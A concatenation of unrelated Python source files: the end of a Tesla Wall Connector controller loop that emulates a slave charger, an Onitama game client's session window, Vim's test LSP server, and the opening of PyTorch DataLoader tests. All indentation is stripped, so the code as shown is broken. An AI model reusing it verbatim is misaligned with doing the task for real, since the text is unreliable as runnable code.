b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
master.newSlave(senderID, maxAmps)
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
try:
slaveTWC = master.slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = master.newSlave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(
b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage request message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.log(
logging.INFO8,
"VRQ from %02X%02X to %02X%02X"
% (senderID[0], senderID[1], receiverID[0], receiverID[1]),
)
if receiverID == fakeTWCID:
kWhCounter = int(master.getkWhDelivered())
kWhPacked = bytearray(
[
((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF),
]
)
logger.info(
"VRS %02X%02X: %dkWh (%s) %dV %dV %dV"
% (
fakeTWCID[0],
fakeTWCID[1],
kWhCounter,
hex_str(kWhPacked),
240,
0,
0,
)
)
master.getInterfaceModule().send(
bytearray(b"\xFD\xEB")
+ fakeTWCID
+ kWhPacked
+ bytearray(b"\x00\xF0\x00\x00\x00\x00\x00")
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (
(data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
)
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage response message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.info(
"VRS %02X%02X: %dkWh %dV %dV %dV"
% (
senderID[0],
senderID[1],
kWhCounter,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
)
)
if foundMsgMatch == False:
logger.info("***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
logger.info("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
logger.info("Unhandled Exception:" + traceback.format_exc())
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Make sure any volatile data is written to disk before exiting
master.queue_background_task({"cmd": "saveSettings"})
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
master.backgroundTasksQueue.join()
# Close the input module
master.getInterfaceModule().close()
#
# End main program
#
##############################
|
SessionView.py | import time
import threading
from tkinter import *
import socket
import errno
import OnitamaMessages
class SessionView:
def __init__(self):
self._quitStatus = 200
self._username = ""
self._sessionname = ""
self._allIncomingTcpData = ""
self._isClosing = False
def ReadAllQueuedTcpData(self):
ret = ''
err = 0
i = 0
while err == 0:
i = i+1
try:
ret = ret + self._serverSocket.recv(4096).decode()
except socket.error as e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
break
else:
# a "real" error occurred
print(e)
print('Terminating ... ')
sys.exit(1)
# print('{0}. err: {1}'.format(i, err))
return ret
def GetGameStartMessage(self):
return self._gameStartMessage
def _processingIncomingMessages(self):
while not self._isClosing:
print("Processing session info message")
self._allIncomingTcpData = \
self._allIncomingTcpData + self.ReadAllQueuedTcpData()
# First potential readable message
MessageDto = OnitamaMessages.ParseMessage(self._allIncomingTcpData)
parseSuccess = MessageDto.GetResult()
while OnitamaMessages.MessageStringResult_Complete == parseSuccess:
print("Parsed message successfully")
# The first message has been successfully cut off
self._allIncomingTcpData = MessageDto.GetRest()
# It was possible to parse the message
MsgObject = MessageDto.GetOnitamaMessage()
# It was a session list message, the one we need here
# process it ...
if OnitamaMessages.SessionInformationMessage == type(MsgObject):
# self._oppoName = MsgObject.GetOppoName()
self._entryOpponentName.config(text=MsgObject.GetOppoName())
if MsgObject.IsHost():
self._infoMessage.set("You are the host.")
self._buttonStart.place(x=275, y=80, width=120, height=20)
else:
self._infoMessage.set("You are the guest.")
self._buttonStart.place_forget()
# It was a start game message, another one we need here
# process it ...
if OnitamaMessages.GamestartMessage == type(MsgObject):
self._gameStartMessage = MsgObject
self._quitStatus = 205
self._tkOnitamaClientWindow.destroy()
del MsgObject
# print(self._allIncomingTcpData)
# See if there are further messages in the string to be processed
MessageDto = OnitamaMessages.ParseMessage(self._allIncomingTcpData)
parseSuccess = MessageDto.GetResult()
# We processed the entire incoming string
# Let the thread take a break and give some space to others
time.sleep(1)
def SetSessionName(self, inSessionname):
self._sessionname = inSessionname
def SetSocket(self, inServerSocket):
self._serverSocket = inServerSocket
def SetUserName(self, inUsername):
self._username = inUsername
def _leaveSession(self):
LeaveSessionM = OnitamaMessages.LeaveSessionMessage()
msgLength = len(LeaveSessionM.ToString())
sentLength = self._serverSocket.send(LeaveSessionM.ToString().encode())
if msgLength != sentLength:
print("Sent only {0} chars of message {1}. Aborting...".
format(sentLength, LeaveSessionM.ToString()))
self._quitStatus = 203
else:
print("Sent leave session message '{0}'.".format(LeaveSessionM.ToString()))
self._quitStatus = 201
self._tkOnitamaClientWindow.destroy()
def _startSession(self):
GamestartRequestM = OnitamaMessages.GamestartRequestMessage()
msgLength = len(GamestartRequestM.ToString())
sentLength = self._serverSocket.send(GamestartRequestM.ToString().encode())
if msgLength != sentLength:
print("Sent only {0} chars of message {1}. Aborting...".
format(sentLength, GamestartRequestM.ToString()))
# self._quitStatus = 204
else:
print("Sent start session message '{0}'.".format(GamestartRequestM.ToString()))
# self._quitStatus = 202
# self._tkOnitamaClientWindow.destroy()
def GetQuitStatus(self):
return self._quitStatus
def Display(self):
self._isClosing = False
self._quitStatus = 200
self._tkOnitamaClientWindow = Tk()
self._tkOnitamaClientWindow.minsize(400, 150)
self._tkOnitamaClientWindow.title('Onitama Client')
self._tkOnitamaClientWindow.geometry('400x150')
welcomeMessage = self._username + ", you are in session " + self._sessionname + "."
self._infoMessage = StringVar(self._tkOnitamaClientWindow)
self._infoMessage.set("")
# Label für die Anzeige der Daten
labelWelcome = Label(master=self._tkOnitamaClientWindow,
text=welcomeMessage,
fg='white', bg='gray',
font=('Arial', 10))
labelWelcome.place(x=5, y=5, width=390, height=20)
labelInfo = Label(master=self._tkOnitamaClientWindow,
textvariable=self._infoMessage,
fg='white', bg='gray',
font=('Arial', 10))
labelInfo.place(x=5, y=30, width=390, height=20)
labelOpponentName = Label(master=self._tkOnitamaClientWindow,
text='Opponent:',
fg='white', bg='gray',
font=('Arial', 10))
labelOpponentName.place(x=5, y=55, width=120, height=20)
self._entryOpponentName = Label(master=self._tkOnitamaClientWindow,
text="",
fg='white', bg='gray',
font=('Arial', 10))
self._entryOpponentName.place(x=130, y=55, width=265, height=20)
buttonLeave = Button(master=self._tkOnitamaClientWindow,
text="Leave Session",
command=self._leaveSession)
buttonLeave.place(x=5, y=80, width=120, height=20)
self._buttonStart = Button(master=self._tkOnitamaClientWindow,
text="Start Session",
command=self._startSession)
self._buttonStart.place(x=275, y=80, width=120, height=20)
self._buttonStart.pack_forget()
self._sessionInfoThread = threading.Thread(target=self._processingIncomingMessages)
self._sessionInfoThread.start()
self._tkOnitamaClientWindow.mainloop()
if (200 == self._quitStatus):
self._serverSocket.close()
self._isClosing = True
|
test_channel_lsp.py | #!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim to test LSP functionality.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def setup(self):
self.request.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
def debuglog(self, msg):
if self.debug:
with open("Xlspserver.log", "a") as myfile:
myfile.write(msg)
def send_lsp_msg(self, msgid, resp_dict):
v = {'jsonrpc': '2.0', 'result': resp_dict}
if msgid != -1:
v['id'] = msgid
s = json.dumps(v)
resp = "Content-Length: " + str(len(s)) + "\r\n"
resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
resp += "\r\n"
resp += s
if self.debug:
self.debuglog("SEND: ({0} bytes) '{1}'\n".format(len(resp), resp))
self.request.sendall(resp.encode('utf-8'))
def send_wrong_payload(self):
v = 'wrong-payload'
s = json.dumps(v)
resp = "Content-Length: " + str(len(s)) + "\r\n"
resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
resp += "\r\n"
resp += s
self.request.sendall(resp.encode('utf-8'))
def send_empty_header(self, msgid, resp_dict):
v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
s = json.dumps(v)
resp = "\r\n"
resp += s
self.request.sendall(resp.encode('utf-8'))
def send_empty_payload(self):
resp = "Content-Length: 0\r\n"
resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
resp += "\r\n"
self.request.sendall(resp.encode('utf-8'))
def send_extra_hdr_fields(self, msgid, resp_dict):
# test for sending extra fields in the http header
v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
s = json.dumps(v)
resp = "Host: abc.vim.org\r\n"
resp += "User-Agent: Python\r\n"
resp += "Accept-Language: en-US,en\r\n"
resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
resp += "Content-Length: " + str(len(s)) + "\r\n"
resp += "\r\n"
resp += s
self.request.sendall(resp.encode('utf-8'))
def send_delayed_payload(self, msgid, resp_dict):
# test for sending the hdr first and then after some delay, send the
# payload
v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
s = json.dumps(v)
resp = "Content-Length: " + str(len(s)) + "\r\n"
resp += "\r\n"
self.request.sendall(resp.encode('utf-8'))
time.sleep(0.05)
resp = s
self.request.sendall(resp.encode('utf-8'))
def send_hdr_without_len(self, msgid, resp_dict):
# test for sending the http header without length
v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
s = json.dumps(v)
resp = "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
resp += "\r\n"
resp += s
self.request.sendall(resp.encode('utf-8'))
def send_hdr_with_wrong_len(self, msgid, resp_dict):
# test for sending the http header with wrong length
v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
s = json.dumps(v)
resp = "Content-Length: 1000\r\n"
resp += "\r\n"
resp += s
self.request.sendall(resp.encode('utf-8'))
def send_hdr_with_negative_len(self, msgid, resp_dict):
# test for sending the http header with negative length
v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
s = json.dumps(v)
resp = "Content-Length: -1\r\n"
resp += "\r\n"
resp += s
self.request.sendall(resp.encode('utf-8'))
def do_ping(self, payload):
time.sleep(0.2)
self.send_lsp_msg(payload['id'], 'alive')
def do_echo(self, payload):
self.send_lsp_msg(-1, payload)
def do_simple_rpc(self, payload):
# test for a simple RPC request
self.send_lsp_msg(payload['id'], 'simple-rpc')
def do_rpc_with_notif(self, payload):
# test for sending a notification before replying to a request message
self.send_lsp_msg(-1, 'rpc-with-notif-notif')
# sleep for some time to make sure the notification is delivered
time.sleep(0.2)
self.send_lsp_msg(payload['id'], 'rpc-with-notif-resp')
def do_wrong_payload(self, payload):
# test for sending a non dict payload
self.send_wrong_payload()
time.sleep(0.2)
self.send_lsp_msg(-1, 'wrong-payload')
def do_large_payload(self, payload):
# test for sending a large (> 64K) payload
self.send_lsp_msg(payload['id'], payload)
def do_rpc_resp_incorrect_id(self, payload):
self.send_lsp_msg(-1, 'rpc-resp-incorrect-id-1')
self.send_lsp_msg(-1, 'rpc-resp-incorrect-id-2')
self.send_lsp_msg(1, 'rpc-resp-incorrect-id-3')
time.sleep(0.2)
self.send_lsp_msg(payload['id'], 'rpc-resp-incorrect-id-4')
def do_simple_notif(self, payload):
# notification message test
self.send_lsp_msg(-1, 'simple-notif')
def do_multi_notif(self, payload):
# send multiple notifications
self.send_lsp_msg(-1, 'multi-notif1')
self.send_lsp_msg(-1, 'multi-notif2')
def do_msg_with_id(self, payload):
self.send_lsp_msg(payload['id'], 'msg-with-id')
def do_msg_specific_cb(self, payload):
self.send_lsp_msg(payload['id'], 'msg-specifc-cb')
def do_server_req(self, payload):
self.send_lsp_msg(201, {'method': 'checkhealth', 'params': {'a': 20}})
def do_extra_hdr_fields(self, payload):
self.send_extra_hdr_fields(payload['id'], 'extra-hdr-fields')
def do_delayad_payload(self, payload):
self.send_delayed_payload(payload['id'], 'delayed-payload')
def do_hdr_without_len(self, payload):
self.send_hdr_without_len(payload['id'], 'hdr-without-len')
def do_hdr_with_wrong_len(self, payload):
self.send_hdr_with_wrong_len(payload['id'], 'hdr-with-wrong-len')
def do_hdr_with_negative_len(self, payload):
self.send_hdr_with_negative_len(payload['id'], 'hdr-with-negative-len')
def do_empty_header(self, payload):
self.send_empty_header(payload['id'], 'empty-header')
def do_empty_payload(self, payload):
self.send_empty_payload()
def process_msg(self, msg):
try:
decoded = json.loads(msg)
if 'method' in decoded:
test_map = {
'ping': self.do_ping,
'echo': self.do_echo,
'simple-rpc': self.do_simple_rpc,
'rpc-with-notif': self.do_rpc_with_notif,
'wrong-payload': self.do_wrong_payload,
'large-payload': self.do_large_payload,
'rpc-resp-incorrect-id': self.do_rpc_resp_incorrect_id,
'simple-notif': self.do_simple_notif,
'multi-notif': self.do_multi_notif,
'msg-with-id': self.do_msg_with_id,
'msg-specifc-cb': self.do_msg_specific_cb,
'server-req': self.do_server_req,
'extra-hdr-fields': self.do_extra_hdr_fields,
'delayed-payload': self.do_delayad_payload,
'hdr-without-len': self.do_hdr_without_len,
'hdr-with-wrong-len': self.do_hdr_with_wrong_len,
'hdr-with-negative-len': self.do_hdr_with_negative_len,
'empty-header': self.do_empty_header,
'empty-payload': self.do_empty_payload
}
if decoded['method'] in test_map:
test_map[decoded['method']](decoded)
else:
self.debuglog("Error: Unsupported method - " + decoded['method'] + "\n")
else:
self.debuglog("Error: 'method' field is not found\n")
except ValueError:
self.debuglog("Error: json decoding failed\n")
def process_msgs(self, msgbuf):
while True:
sidx = msgbuf.find('Content-Length: ')
if sidx == -1:
# partial message received
return msgbuf
sidx += 16
eidx = msgbuf.find('\r\n')
if eidx == -1:
# partial message received
return msgbuf
msglen = int(msgbuf[sidx:eidx])
hdrend = msgbuf.find('\r\n\r\n')
if hdrend == -1:
# partial message received
return msgbuf
if msglen > len(msgbuf[hdrend + 4:]):
if self.debug:
self.debuglog("Partial message ({0} bytes)\n".format(len(msgbuf)))
# partial message received
return msgbuf
if self.debug:
self.debuglog("Complete message ({0} bytes) received\n".format(msglen))
# Remove the header
msgbuf = msgbuf[hdrend + 4:]
payload = msgbuf[:msglen]
self.process_msg(payload)
# Remove the processed message
msgbuf = msgbuf[msglen:]
def handle(self):
self.debug = False
self.debuglog("=== socket opened ===\n")
msgbuf = ''
while True:
try:
received = self.request.recv(4096).decode('utf-8')
except socket.error:
self.debuglog("=== socket error ===\n")
break
except IOError:
self.debuglog("=== socket closed ===\n")
break
if received == '':
self.debuglog("=== socket closed ===\n")
break
# Write the received lines into the file for debugging
if self.debug:
self.debuglog("RECV: ({0} bytes) '{1}'\n".format(len(received), received))
# Can receive more than one line in a response or a partial line.
# Accumulate all the received characters and process one line at
# a time.
msgbuf += received
msgbuf = self.process_msgs(msgbuf)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def writePortInFile(port):
# Write the port number in Xportnr, so that the test knows it.
f = open("Xportnr", "w")
f.write("{0}".format(port))
f.close()
def main(host, port, server_class=ThreadedTCPServer):
# Wait half a second before opening the port to test waittime in ch_open().
# We do want to get the port number, get that first. We cannot open the
# socket, guess a port is free.
if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
port = 13684
writePortInFile(port)
time.sleep(0.5)
server = server_class((host, port), ThreadedTCPRequestHandler)
ip, port = server.server_address[0:2]
# Start a thread with the server. That thread will then start a new thread
# for each connection.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
writePortInFile(port)
# Main thread terminates, but the server continues running
# until server.shutdown() is called.
try:
while server_thread.is_alive():
server_thread.join(1)
except (KeyboardInterrupt, SystemExit):
server.shutdown()
if __name__ == "__main__":
main("localhost", 0)
|
test_dataloader.py | # Owner(s): ["module: dataloader"]
import math
import sys
import errno
import multiprocessing
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import (
ChainDataset,
ConcatDataset,
DataLoader,
DataLoader2,
Dataset,
IterableDataset,
Subset,
TensorDataset,
communication,
_utils
)
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch.utils.data.datapipes.iter import IterableWrapper
from torch.utils.data.datapipes.map import SequenceWrapper
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_IN_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_ASAN, TEST_WITH_TSAN, IS_SANDCASTLE)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_IN_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = unittest.skipIf(not HAS_DILL, "no dill")
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if TEST_CUDA:
dev_name = torch.cuda.get_device_name(torch.cuda.current_device()).lower()
IS_JETSON = 'xavier' in dev_name or 'nano' in dev_name or 'jetson' in dev_name or 'tegra' in dev_name
else:
IS_JETSON = False
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
# data loader terminiates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
# Mixing different start method is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for a inter-process communication can be highly varying. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
# takes in dummy var so this can also be used as a `worker_init_fn`
def set_faulthander_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
# Setting disable_stderr=True may generate a lot of unrelated error outputs
# but could be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
